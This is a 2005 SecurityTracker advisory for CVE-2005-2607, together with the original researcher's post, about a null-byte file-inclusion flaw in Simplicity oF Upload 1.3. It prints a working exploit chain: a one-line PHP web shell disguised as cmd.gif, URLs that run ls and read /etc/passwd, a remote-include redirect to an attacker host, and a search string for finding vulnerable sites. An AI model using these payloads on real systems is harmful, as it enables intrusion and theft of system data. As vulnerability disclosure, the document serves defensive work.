Simplicity oF Upload Lets Remote Users Upload and Execute Arbitrary Code
|
|
SecurityTracker Alert ID: 1014591
|
|
SecurityTracker URL: http://securitytracker.com/id?1014591
|
|
CVE Reference: CVE-2005-2607
(Links to External Site)
|
Updated: Jul 6 2008
|
Original Entry Date: Jul 28 2005
|
Impact: Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Version(s): 1.3
|
Description: rgod reported a vulnerability in Simplicity oF Upload. A remote user can upload and then execute arbitrary code on the target system.
The script does not properly validate user-supplied input in the 'language' parameter. A remote user can supply a specially crafted
parameter value ending in a null byte (%00) to include arbitrary local files.
A remote user can submit the following URL to cause
both the download and upload pages to load at the same time:
http://[target]/simply/download.php?language=upload.php%00
This
allows the remote user to upload a file that contains arbitrary PHP code but has a filename that appears to be an image file (e.g.,
'cmd.gif'). A demonstration exploit file is provided:
<?php
system($HTTP_GET_VARS[command]);
?>
Then, the remote
user can invoke the uploaded file to execute arbitrary commands on the target system with the privileges of the target web service.
A demonstration exploit URL is provided:
http://[target]/[path]/download.php?language=cmd.gif%00&command=ls
A remote user
can also supply a specially crafted URL that, when loaded by the target user, will redirect the target user to another web page:
http://[target]/[path]/download.php?language=http://[attacker]/[evil_page]%00
|
Impact: A remote user can upload arbitrary code to the target system and then have the web server execute the code.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.phpsimplicity.com/scripts.php?id=3 (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: "retrogod@aliceposta.it" <retrogod@aliceposta.it>
|
Message History:
None.
|
Source Message Contents
|
Date: Tue, 26 Jul 2005 16:24:19 +0200 (ora legale Europa occidentale)
From: "retrogod@aliceposta.it" <retrogod@aliceposta.it>
Subject: Simplicity OF Upload 1.3 (possibly prior versons) remote code execution & cross site scripting
|
Simplicity OF Upload 1.3 (possibly prior versons) remote code execution
& cross site scripting
software:
author site: http://www.phpsimplicity.com/scripts.php?id=3
remote commands execution:
problem at line 25-30:
...
//check for language overriding..
if (isset($_GET['language']))
$language = strtolower($_GET['language']);
//now we include the language file
require_once("$language.lng");
...
you can include whatever adding a null byte to "language" parameter value:
example:
http://localhost:30/simply/download.php?language=upload.php%00
you will see upload & download page together :)
so you can upload a cmd.gif (when you upload a .php file, usually it is
renamed to .html...) file with this php code inside to execute
commands:
<?php
system($HTTP_GET_VARS[command]);
?>
then try this url:
http://[target]/[path]/download.php?language=cmd.gif%00&command=ls
to list directories
http://[target]/[path]/download.php?language=cmd.gif%00&command=cat%20/etc/passwd
to show /etc/passwd file
cross site scripting:
also, a remote user can supply a specially crafted URL to redirect other people
to an evil page:
http://[target]/[path]/download.php?language=http://[evil_site]/[evil_page]%00
googledork:
"Powered By: Simplicity oF Upload"
rgod
email: rgod[at]autistici.org
site: http://rgod.altervista.org
original advisory: http://rgod.altervista.org/simply.html
_____________________________________________________________________
FREE Emoticons for your email! Click Here!
|
|
